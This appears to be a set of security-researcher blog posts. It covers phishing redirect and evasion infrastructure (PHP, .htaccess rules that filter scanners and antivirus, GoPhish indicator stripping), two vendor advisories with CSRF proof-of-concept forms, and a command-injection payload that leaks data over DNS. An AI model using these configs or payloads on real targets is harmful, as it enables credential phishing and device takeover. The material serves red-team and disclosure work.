Introduction

In this post, we detail a PHP script designed to dynamically generate JavaScript code for redirecting users while bypassing some email protections. We also explore the advanced use of Apache’s .htaccess files to manage web traffic during a phishing campaign.

The GoPhish IOCs were removed, and the default rid value was replaced with ogt. You can find more info in Phishing Campaigns: Simulating Real Adversary Tactics.

PHP Code for Dynamic Redirection

Below is the code for redirect.php, which validates a token (ogt), performs necessary checks, and generates dynamic JavaScript that redirects users to a login portal.

<?php
// redirect.php
// Validate the token
if (!isset($_GET['ogt']) || !preg_match('/^[a-zA-Z0-9]{7}$/', $_GET['ogt'])) {
    die('Invalid token.');
}

$token = $_GET['ogt'];

// Generate a random variable name to obfuscate the JS code
$randomVar = substr(md5(rand()), 0, 8);
$redirectUrl = "https://login.acme-lab.com/?ogt=" . $token;

// Set HTML content header
header('Content-Type: text/html');
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Redirecting...</title>
    <script type="text/javascript">
        (function(){
            // Random variable to avoid fixed patterns in the code
            var <?php echo $randomVar; ?> = '<?php echo $redirectUrl; ?>';
            // Dynamic redirection to the login URL
            window.location.href = <?php echo $randomVar; ?>;
        })();
    </script>
</head>
<body>
    <noscript>
        If you are not redirected automatically, click <a href="<?php echo $redirectUrl; ?>">here</a>.
    </noscript>
</body>
</html>

Technical Explanation

1. Token Validation:
   The script checks if the ogt parameter exists and conforms to the expected pattern (7 alphanumeric characters). If not, the script exits.

2. Random Variable Generation:
   A random variable name is generated to hold the redirection URL, which obfuscates the JavaScript code and makes it harder for automated tools to detect a fixed pattern.

3. Dynamic JavaScript Generation:
   The PHP script outputs HTML that includes a JavaScript snippet. This snippet creates the randomly named variable and immediately redirects the browser to the generated URL. A <noscript> tag is included for users with disabled JavaScript.

Web Traffic Flow and .htaccess Configuration

The report outlines a controlled web traffic flow using Apache rewrite rules and .htaccess configurations. Below is a detailed explanation of the configurations.

Traffic Flow

1. User Entry:
   The user receives a link structured as follows:

   https://lading.acme-lab.com/?ogt=3XdwYUe
   

   • lading.acme-lab.com: The domain that receives the request.
   • ogt=3XdwYUe: A token used for tracking.
2. Internal Redirection:
   The server internally forwards the user to:

   https://lading.acme-lab.com/redirect.php?ogt=3XdwYUe
   

   where the PHP script (shown above) dynamically generates the JavaScript for redirection.

3. Final Destination:
   Ultimately, the user is redirected to:

   https://login.acme-lab.com/?ogt=3XdwYUe
   

   which hosts the cloned captive portal for the campaign.

4. Infrastructure Setup:
   • GoPhish Deployment: GoPhish is hosted on an internal server that is not directly accessible from the internet.
   • Reverse SSH Proxy: The domain login.acme-lab.com acts as a proxy that forwards traffic to the internal GoPhish instance using reverse SSH tunneling. This allows external users to interact with GoPhish’s phishing portal without exposing it directly.
   • Port Forwarding: The reverse SSH connection binds the internal GoPhish service running on port 8080 to the external-facing proxy.

.htaccess Configurations

Two .htaccess files were employed, one for the landing page and another for the login portal to manage traffic effectively. Below, we detail each configuration.

.htaccess hosted in lading.acme-lab.com

RewriteEngine On

# 1. Check if the request is for /track
# 2. Check if the query string contains ogt parameter
# 3. Check if the user-agent is GoogleImageProxy
# If all 3 conditions are met, redirect to https://login.acme-innov.com/track?%{QUERY_STRING}
RewriteCond %{REQUEST_URI} ^/track$ [NC]
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&) [NC]
RewriteCond %{HTTP_USER_AGENT} via\ ggpht\.com\ GoogleImageProxy [NC]
RewriteRule ^ https://login.acme-lab.com/track?%{QUERY_STRING} [R=302,L]


# Redirect empty bots and user-agents to Okta
RewriteCond %{HTTP_USER_AGENT} "WebZIP|wget|curl|HTTrack|crawl|google|bot|b\-o\-t|spider|baidu|python|scrapy|postman|semrush|avast|Norton|Kaspersky|MSIE|trident" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ https://acme-labo.okta.com [R=302,L]

# If the URI is exactly /redirect.php and, if so, stops any further rewriting rules from being applied to this request.
RewriteCond %{REQUEST_URI} ^/redirect\.php$ [NC]
RewriteRule ^ - [L]

# If the URI is exactly /favicon.ico and, if so, stops any further rewriting rules from being applied to this request.
RewriteCond %{REQUEST_URI} ^/favicon\.ico$ [NC]
RewriteRule ^ - [L]

# Redirect URLs with ogt parameter to redirect.php respecting ALL query params
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&)
RewriteRule ^ /redirect.php [L,QSA]

# Redirect all other requests to Okta without parameters
RewriteRule ^.*$ https://acme-labo.okta.com [R=302,L]

.htaccess hosted in GoPhish for extra-evasion

RewriteEngine On

#For GoPhish tracking
RewriteCond %{REQUEST_URI} ^/track$ [NC]
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&) [NC]
RewriteCond %{HTTP_USER_AGENT} via\ ggpht\.com\ GoogleImageProxy [NC]
RewriteRule ^.*$ http://localhost:8080%{REQUEST_URI} [P,L]

#Avoiding BlueTeam
RewriteCond %{HTTP_USER_AGENT} "wget|curl|HTTrack|crawl|google|bot|b\-o\-t|spider|baidu" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ https://acme-labo.okta.com? [L,R=302]

#For Gophish
RewriteCond %{QUERY_STRING} ogt=(.+)
RewriteCond %{QUERY_STRING} js_executed=1 [OR]
RewriteCond %{QUERY_STRING} !js_executed=
RewriteRule ^.*$ http://localhost:8080%{REQUEST_URI} [P,L]

#Others
RewriteRule ^.*$ https://acme-labo.okta.com? [L,R=302]

Conclusion

In this post, we showcased how a PHP script can dynamically generate JavaScript for user redirection within a phishing campaign, complemented by advanced .htaccess rules for traffic management. By combining server-side validation with client-side dynamic redirection and leveraging Apache’s rewrite capabilities, it is possible to bypass common email protections and maintain tight control over the traffic flow.

This infrastructure setup allows GoPhish to remain internal while still serving external users through a reverse SSH proxy, reducing exposure and making detection more challenging.

Net Vision is a communication interface designed for enterprise networks that enables a direct and secure connection between the UPS and the Ethernet network. This connection provides a wide range of network services, including UPS monitoring, event notifications, automatic shutdown of UPS-powered servers, and many other services. Net Vision also functions as an IoT gateway, granting access to a variety of digital services. It is compatible with all UPS models equipped with a communication slot.

Power management in critical infrastructure requires reliable monitoring and control capabilities. Socomec, a company specializing in low-voltage electrical equipment, offers NET VISION - a professional network adapter designed for remote UPS monitoring and control. This adapter enables direct UPS connection to IPv4/IPv6 networks, allowing remote management through web browsers, TELNET interfaces, or SNMP-based Network Management Systems (NMS).

During a security assessment at IOActive, I evaluated version 7.20 of the NET VISION adapter and discovered several security issues that could potentially impact organizations using these devices for UPS management. These findings highlight the ongoing challenges in securing industrial monitoring equipment.

CSRF Vulnerability in Password Change Functionality (CVE-2024-4600)

Description

The first vulnerability, rated as MEDIUM severity, involves a Cross-Site Request Forgery (CSRF) weakness in the password change mechanism. The web interface lacks proper CSRF protections, allowing an attacker to trick authenticated administrators into unknowingly changing their passwords.

What makes this vulnerability particularly concerning is that the password change functionality doesn’t require the current password for verification, making the attack easier to execute.

Proof of Concept

The vulnerability can be exploited using this simple HTML form:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://[DEVICE-IP]/cgi/set_param.cgi"
method="POST" enctype="text/plain">
<input type="hidden"
name="xml&amp;user&#46;su&#46;passCheck&#91;0&#93;"
value="IOActive1234&amp;user&#46;su&#46;passCheck&#91;1&#93;&#61;
IOActive1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

When an authenticated administrator visits a page containing this code, their password would be changed to “IOActive1234” without their knowledge or consent.

Impact

An attacker could:

• Change administrator passwords without knowing the current password
• Lock legitimate administrators out of their systems
• Gain unauthorized access to UPS management functions
• Potentially disrupt power management operations

Weak Session Management (CVE-2024-4601)

Description

The second vulnerability, rated as LOW severity, relates to weak session management implementation. The application uses a five-digit integer for session handling, which is cryptographically insufficient for secure session management.

The session token is generated using this JavaScript code in /super_user.js:

function runScript(e) {
    if (e.keyCode == 13) {
        var hashkey2 = Base64.encode($("#login-box #password").val());
        var tmpToken = getRandomInt(1,1000000);
        Set_Cookie("user_name",$("#login-box #username").val());
        Set_Cookie("tmpToken", tmpToken);
        document.getElementById("token").value = tmpToken;

Impact

This implementation is vulnerable because:

• The session token space is too small (maximum of 1,000,000 possible values)
• Tokens are predictable due to the simple random number generation
• An attacker could potentially brute force valid session tokens
• The implementation lacks many security best practices for session management

Timeline and Resolution

• September 29, 2022: Vulnerabilities discovered
• June 28, 2023: Vulnerabilities reported to Socomec
• November 21, 2023: Socomec confirmed fixes in new NET VISION card (version 8)
• January 9, 2024: Vulnerabilities reported to INCIBE (Spanish CERT)
• March 5, 2024: Advisory published

Recommendations

For organizations using NET VISION adapters:

1. Upgrade to NET VISION version 8 or later as soon as possible
2. Implement network segmentation to isolate UPS management interfaces
3. Use VPNs or similar secure access methods for remote management
4. Regularly monitor for unauthorized access attempts
5. Implement proper access controls at the network level

For manufacturers implementing web interfaces:

1. Implement proper CSRF protection using tokens
2. Require current password verification for password changes
3. Use cryptographically secure session management
4. Follow OWASP session management best practices
5. Implement proper security controls from the design phase

Conclusion

These vulnerabilities in the NET VISION adapter demonstrate common web security issues that continue to appear in industrial equipment. While the individual vulnerabilities might not seem critical in isolation, their combination could allow attackers to compromise UPS management systems, potentially affecting critical infrastructure availability.

Find all the details of this advisory on IOActive’s Blog

Designed to be installed in heavy industrial demanding environments, the IGS-4215-16T2S / IGS-4215-16T2S-U is the new member of PLANET Industrial-grade, DIN-rail type L2/L4 Managed Gigabit Switch family to improve the availability of critical business applications. It provides IPv6/IPv4 dual stack management and built-in L2/L4 Gigabit switching engine along with 16 10/100/1000BASE-T ports, and 2 extra 100/1000BASE-X SFP fiber slots for data and video uplink. The IGS-4215-16T2S / IGS-4215-16T2S-U is able to operate reliably, stably and quietly in any hardened environment without affecting its performance. It comes with operating temperature ranging from -40 to 75 degrees C in a rugged IP30 metal housing.

Industrial networking equipment plays a crucial role in modern infrastructure, connecting and controlling critical systems across manufacturing plants, energy facilities, and smart city deployments. The PLANET IGS-4215-16T2S is a managed industrial switch designed for these demanding environments, featuring 16 10/100/1000T ports and 2 100/1000X SFP ports, making it a popular choice for industrial applications requiring reliable Ethernet connectivity.

During a recent security assessment at IOActive, I had the opportunity to analyze this device from a security perspective. The IGS-4215-16T2S comes with features like VLAN support, Quality of Service (QoS), and various management interfaces, including a web-based administration panel. However, our investigation revealed several concerning security vulnerabilities that could potentially compromise not just the device itself, but the entire industrial network it’s connected to.

Unauthenticated Access to Backup Files (CVE-2024-2740)

Description

The first and most critical vulnerability discovered carries a HIGH severity rating. While the device’s administrative web interface requires authentication for most operations, we found that the session verification mechanism failed to protect several critical system resources.

The device stores various configuration and backup files in predictable paths within the /tmp/ directory, including:

• /tmp/ram.log
• /tmp/running-config.cfg
• /tmp/backup-config.cfg

What makes this particularly concerning is that these files contain sensitive information, including device credentials, and can be accessed without any authentication.

Impact

An unauthenticated attacker could:

• Access complete device configurations
• Extract stored usernames and passwords
• Potentially compromise the entire industrial network
• Gain persistent access to the device and its management features

CSRF in Administrative User Creation (CVE-2024-2741)

Description

The second vulnerability, rated as MEDIUM severity, enables Cross-Site Request Forgery (CSRF) attacks that could lead to unauthorized creation of administrative users without the legitimate administrator’s knowledge.

The issue stems from several security oversights:

1. No CSRF tokens implementation to protect sensitive actions
2. Acceptance of GET requests for operations that should be POST-only
3. Lack of re-authentication requirements for critical actions like user creation

Proof of Concept

The vulnerability can be exploited using a simple HTML form:

<form action="https://[DEVICE-IP]/cgi-bin/dispatcher.cgi">
    <input type="hidden" name="usrName" value="test" />
    <input type="hidden" name="usrPassType" value="1" />
    <input type="hidden" name="usrPass" value="ioactive" />
    <input type="hidden" name="usrPass2" value="ioactive" />
    <input type="hidden" name="usrPrivType" value="15" />
    <input type="hidden" name="cmd" value="525" />
    <input type="submit" value="Submit request" />
</form>

Impact

An attacker could:

• Create new administrative users without authorization
• Gain persistent access to the device
• Execute malicious actions appearing as legitimate user activity
• Maintain long-term unauthorized access even after the initial compromise is detected

Authenticated Remote Code Execution (CVE-2024-2742)

Description

The third vulnerability discovered, rated as LOW severity, affects the Ping Test functionality located in the device’s diagnostic tools (Maintenance -> Diagnostic -> Ping Test -> IP Address). The issue stems from inadequate input sanitization in the ping test function, which could allow an authenticated attacker to execute arbitrary commands on the device.

Proof of Concept

The vulnerability can be exploited by injecting commands into the ping test functionality. For demonstration purposes, we used DNS requests to exfiltrate sensitive system information:

;ping `uname`.subdomain.com

When this payload is entered into the Ping Test functionality, the device:

1. Executes the uname command
2. Uses the output as part of a domain name
3. Attempts to ping the resulting domain name

This resulted in DNS queries being made to domains like:

• Linux.zoraoperl8y4x71u2jb3rbopjgp6dv.oastify.com
• root.zoraoperl8y4x71u2jb3rbopjgp6dv.oastify.com

These DNS queries confirmed that:

• The system is running Linux
• The web application is running with root privileges

Impact

An authenticated attacker could:

• Execute arbitrary commands on the device
• Gather sensitive system information
• Potentially compromise the entire device
• Use the device as a pivot point for further network attacks

Timeline and Resolution

The vulnerability was discovered on September 29, 2022, and reported to PLANET Technology on March 29, 2023. The manufacturer released a firmware update (version 1.305b231218) on December 13, 2023, that addresses these vulnerabilities.

Recommendations

For network administrators using these devices, we recommend:

1. Immediately upgrade to the latest available firmware
2. Implement network segmentation to isolate these devices
3. Actively monitor access to these equipments
4. Consider implementing additional security controls at the network level

Conclusion

These vulnerabilities highlight the ongoing challenges in industrial device security. Basic security controls like session verification and CSRF protection should be standard features in any networked device, especially those deployed in critical industrial environments.

This research underscores the importance of regular security assessments for industrial network equipment, as even seemingly basic vulnerabilities can have significant implications for operational technology environments.

Find all the details of this advisory on IOActive’s Blog

Nowadays, one of the most dangerous and effective attack vectors is the phishing campaigns. From an offensive perspective, there are several differences between a whaling campaign and a massive phishing campaign. However, there are also several common points that should be accomplished in both cases.

At security professional, one of the goals is to help improve security in the industry. To achieve this target, annual phishing campaigns works well to enhance the detection and reporting rates of entities and companies.

The post will cover several phases of these engagements and provide some details on how we work to achieve our goals.

Infrastructure

Starting with a Red Team Infrastructure model, team server and redirectors are used. Redirectors play a crucial role in Red Team engagements, as they are used to conceal the actual IP addresses and route traffic through intermediate points before reaching the target network. This obfuscation enhances the red team’s stealth during attacks, making it more challenging for defenders to detect and respond to their activities. Redirectors are essential for maintaining the security of client information on the team server, which is allocated in the company’s internal network.

The team server serves as a centralized command center that communicates with compromised systems or “agents” deployed on target networks. In the context of a phishing campaign, the team server is employed to run the applications and tools necessary for conducting the engagement.

To achieve this, we will be utilizing Traefik as a redirector. Traefik will handle SSL certificates and help route traffic securely. Additionally, GoPhish will be used to send emails and manage the campaign effectively. To establish seamless and secure connections between the elements, we will use Headscale, which is a self-hosted alternative compatible with Tailscale. This combination of tools ensures that data is protected, and the engagement is conducted with utmost safety and confidentiality in mind.

Redirector

As a redirector, a Linux host in the cloud was utilized. There are various trusted platforms available for this purpose, and the choice depends on individual preferences and requirements.

To run Traefik, Docker needs to be installed as it serves as the containerization platform for Traefik. According to the website, Traefik is an open-source Edge Router that simplifies the process of publishing your services. It acts as a request receiver on behalf of your system and determines which components are responsible for handling those requests. Developed in Golang, Traefik is known for being lightweight and faster than other commonly used options like Apache and Nginx.

Although, we will not go over the configuration files, in this case, traefik used two different files traefik.toml, where the server configuration, such as ports or logs paths, is stored. The second file is traefik_dynamic.toml, which is referenced in traefik.toml. This file is responsible for handling the SSL configuration and the behavior of the redirector.

By leveraging Docker and these configuration files, Traefik provides a user-friendly experience for managing and routing your services efficiently.

Additionally, Traefik has built-in capabilities to handle SSL certification. However, for our setup, we will generate SSL certificates using cerboot. The main goal of this post is to learn how to deploy a full phishing infrastructure. To reduce the detection rate, it should not use cerbotot. A self-signed SSL certificate in combination with Cloudflare is a better option.

To ensure all the software needed is installed in the host, the script ‘redirector.sh’ will install cerboot, docker, tailscale and other software required to set up our redirector correctly.

To ensure that all the necessary software is installed on the host, we have created a convenient script called redirector.sh. This script will install cerboot, Docker, Tailscale, and any other required software to set up our redirector correctly.

The SSL certificates generated with cerboot will be stored in the cert/ folder, while all the log files will be found in log/. Additionally, the system/ folder will store files required by Traefik in case you want to run Traefik as a service on the host.

dan1t0@cybertron:~/dinam1t0$ ls -1
cert/
log/
redirector.sh
systemd
traefik.sh
traefik.toml
traefik_dynamic.toml

traefik.sh allows to build the configuration of the redirector in case it was not run previously.

dan1t0@cybertron:~/dinam1t0$ sudo ./traefik.sh build hack.attacker.com
- Genereting SSL certs with certboot...
  -> Checking IPs
  -> Local IP: X.X.X.X (hidden)
  -> hack.attacker.com point to X.X.X.X (hidden)
cerbot command -> certbot certonly --standalone -d hack2.attacker.com --staple-ocsp --agree-tos --register-unsafely-without-email

- SSL certificates generated correctly
- Certificates found
- Running docker containers
  -> Cleaning previous version
     docker rm -f traefik
  -> Deploying docker
docker run -d -v /var/run/docker.sock:/var/run/docker.sock -v /home/dan1t0/dinam1t0/log:/log -v /home/dan1t0/dinam1t0/cert:/cert -v /home/dan1t0/dinam1t0/traefik.toml:/traefik.toml -v /home/dan1t0/dinam1t0/traefik_dynamic.toml:/traefik_dynamic.toml -p 80:80 -p 443:443 --name traefik --hostname traefik traefik:v2.10
traefik
fbc5ed8f95e4ac284ce0a8f4e9749946d7b22531646993f50b86a280fabdbff5

dan1t0@cybertron:~/dinam1t0$ sudo docker ps
CONTAINER ID   IMAGE           COMMAND                  CREATED         STATUS         PORTS                                                                      NAMES
fbc5ed8f95e4   traefik:v2.10   "/entrypoint.sh trae…"   9 seconds ago   Up 6 seconds   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   traefik

While the script can be executed with just one domain name, it also accepts multiple domain names as input.

Although, this blogpost is not a tutorial about how traefik works, we will focus on discussing two of the most crucial aspects of the configuration in traefik_dynamic.toml:

[http.routers.gophish]
  rule = "Host(`hack.attacker.com`) && Query(`ogt=`) && !HeadersRegexp(`User-Agent`, `(?i:wget|curl|HTTrack|crawl|google|bot|b-o-t|spider|baidu)`)"
  entrypoints = ["websecure"] # ["web"]
  service = "gophish"
  priority = 30
  [http.routers.gophish.tls]

[http.services.gophish]
  [http.services.gophish.loadBalancer]
    [[http.services.gophish.loadBalancer.servers]]
      url = "http://gophish:8080/"

[http.routers.gophish] is the section in the configuration where the redirector rules are defined. Within this section, various options supported by Traefik can be utilized, such as filtering requests based on user-agent or adding special strings to the URL, in this example the string ogt is used. The explanation about the string value will be explained below.

Filtering traffic by the User-Agent header in a phishing campaign is an important defensive measure to detect and potentially block or limit the Blue Team activities. The User-Agent header is a part of the HTTP request sent by web browsers, applications, or automated scripts when they communicate with a web server. It contains information about the client’s identity, such as the type of browser or application and its version. In addition to Blue Teams, it is recommended to add user-agent of bots to avoid be flagged easily.

[http.services.gophish] sets the internal path where the request that meet our requirements are sent. In our case, it will be sent to http://gophish:8080/ where our Gophish instance is running internally. The hostname is configured during the Tailscale configuration process.

GoPhish

GoPhish is a well-known tool for conducting phishing campaigns. However, it is recommended to add some modifications in the original source to remove IOCs.

These IOCs are potential signs of a security breach or malicious activity that could be used by defenders or security tools to detect and respond to phishing attempts.

By removing IOCs from the source code, the phishing campaigns become more challenging for defenders to detect, allowing the red team to maintain a higher level of stealth and effectiveness during engagements.

A good starting point to remove the GoPhish IOCs is Sneaky GoPhish where the following lines are modified:

# Stripping X-Gophish 
sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go

# Stripping X-Gophish-Signature
sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go

# Changing servername
sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go

# Changing rid value
sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "ogt"/g' models/campaign.go

The parameter rid is added to the URL of the link sent to the targeted user. In the previous example, it was changed to the highlighted string ogt.

This string is added in the configuration of the redirector in the traefik configuration files. As a result, the URL of the cloned portal location and the pixel tracking sent to the target will be modified by this http://hack.attacker.com/?ogt={randomToken}.

Once the changes are made, gophish source code is ready to be built by executing go build.

To boost our phishing infrastructure, we can monitor Gophish using additional scripts running in our internal server. These scripts will enable us to receive real-time alerts every time a user submits their credentials. We can achieve this by leveraging tools like Pushover, which will provide instant notifications.

Another effective strategy is to use Sendinblue or Mailgun over SMTP or explore other alternatives to get instant karma in our emails and save time that we can use to improve our ruses.

In the future, we will share some Gophish tricks to further enhance the efficiency and effectiveness of our campaigns.

Recently, I have decided to revive my old blog by re-publishing my early cybersecurity posts as a tribute to where it all began. These posts, all in Spanish and flagged with ”[THE BEGINNINGS]” in their titles, were originally hosted on https://dan1t0.wordpress.com (El Rincón de dan1t0) back in 2010. At that time, I simply shared small tips and personal experiences that helped me take my first steps in IT security.

Reading these entries now, I am amazed at how far I’ve come. They remind me of my humble beginnings as a security auditor and ethical hacker. For sentimental reasons—and to preserve this important legacy—I am keeping these posts alive.

Below are the articles I’m referring to:

• [THE BEGINNINGS] Tipos de ataques Denial-of-Service
• [THE BEGINNINGS] Wireshark: Instalación en Mac OS y manual de uso
• [THE BEGINNINGS] Análisis de redes: Enumeración de sistemas Windows
• [THE BEGINNINGS] Qué es y cómo funciona un escaneo de puertos Idle
• [THE BEGINNINGS] Seguridad: comprometiendo un switch (Parte 1 de 2)
• [THE BEGINNINGS] Manifiesto por una Red Neutral
• [THE BEGINNINGS] Seguridad: comprometiendo un switch (Parte 2 de 2)
• [THE BEGINNINGS] GNS3: Instalación y configuración básica
• [THE BEGINNINGS] Tips: Jailbreak iPad 4.2.1 Untethered Greenpois0n
• [THE BEGINNINGS] Scapy: Construyendo un paquete UDP
• [THE BEGINNINGS] ZAP y proxys Web: Analizar el trafico durante la navegación
• [THE BEGINNINGS] RFI/LFI: ¿y ahora qué?
• [THE BEGINNINGS] Configuración fácil y rápida de OpenVPN en MacOS X
• [THE BEGINNINGS] DoS sobre renegociación SSL/TLS (CVE-2011-1473)
• [THE BEGINNINGS] pySIM-Reader: Accediendo a una tarjeta SIM
• [THE BEGINNINGS] Tools y Contribuciones

In this post, I explain my journey of reviving my blog by bringing these early entries back into the spotlight as a reminder of my progress over the years. Moving forward, the content here will focus on current cybersecurity topics, but I felt it was important to preserve these legacy posts for both sentimental and historical reasons.

Happy Hacking!